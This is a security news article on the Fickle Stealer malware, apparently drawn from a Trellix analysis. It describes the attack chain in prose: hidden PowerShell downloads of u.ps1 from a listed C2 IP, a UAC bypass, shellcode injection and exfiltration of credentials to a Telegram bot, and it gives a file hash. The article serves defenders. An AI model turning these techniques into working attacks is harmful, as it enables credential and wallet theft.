Fickle Stealer, a new Rust-based malware, is actively exploiting multiple attack vectors to infiltrate systems by leveraging PowerShell to bypass UAC and exfiltrates sensitive data, including credentials, browser history, cryptocurrency wallet details, and system information.Â
The malware evades detection by employing various techniques, such as file format diversity and self-deletion. Its ability to download files, capture screenshots, and display deceptive error messages further enhances its stealth and destructive potential.
It is a new malware variant and has been actively exploiting various attack vectors since May 2024, including drive-by downloads, disguised legitimate applications, ransomware payloads, and even leveraging invalid digital certificates.
Once installed, the malware evades security mechanisms like UAC to establish persistence, whose primary objective is to exfiltrate sensitive data from infected systems, posing a significant threat to organizations and individuals alike.
A sophisticated malware leverages a multi-stage attack chain, including VBA droppers and downloaders, to infiltrate vulnerable Windows systems by employing advanced obfuscation techniques, such as custom packing, to mask its malicious code and evade static analysis.
The malware’s payload utilizes anti-analysis techniques to bypass sandbox environments and debugging tools, ensuring its stealthy operation. By generating deceptive error messages and detecting signs of analysis, Fickle Stealer successfully evades detection while exfiltrating sensitive data from compromised systems.
An analyzed file contains obfuscated strings indicative of malicious activity, where the strings, when decoded, reveal a PowerShell command designed to execute a hidden script remotely, which is fetched from a specific IP address, likely a Command and Control (C2) server.
The command employs various techniques to evade detection, including running the PowerShell window in hidden mode and bypassing execution policies, which suggests a sophisticated attack aimed at stealthily compromising the system.
The u.ps1 script leverages a UAC bypass technique to execute Fickle Stealer and establish a persistent threat by scheduling engine.ps1. Engine.ps1 scans specific drives for executables and injects shellcode, which downloads and executes u.ps1 from the internet.
It also logs injected file paths in base64 format to a shared location, preventing redundant injections, as the overall goal is to exfiltrate sensitive victim information, such as geolocation, system details, and user credentials, to a Telegram bot controlled by the attacker.
According to Trellix, the analyzed file (MD5: C3C7DAA897ABEB907AEB13250E882FE5) silently executes and terminates itself upon execution.Â
However, it stealthily launches PowerShell, which in turn employs cmd to establish a covert connection (C&C) to a remote server (185.213.208.245) by executing a malicious PowerShell script (u.ps1) with elevated privileges and hidden execution.
It is a malicious payload associated with the Fickle Stealer malware, as upon execution, it attempts to establish a connection with the IP address 185.213.208.245 to download additional malicious components.
To circumvent User Account Control (UAC) restrictions, the file employs a PowerShell script to execute the core Fickle Stealer payload, while the validity of the digital certificate embedded within the file can be assessed using the sigcheck tool.
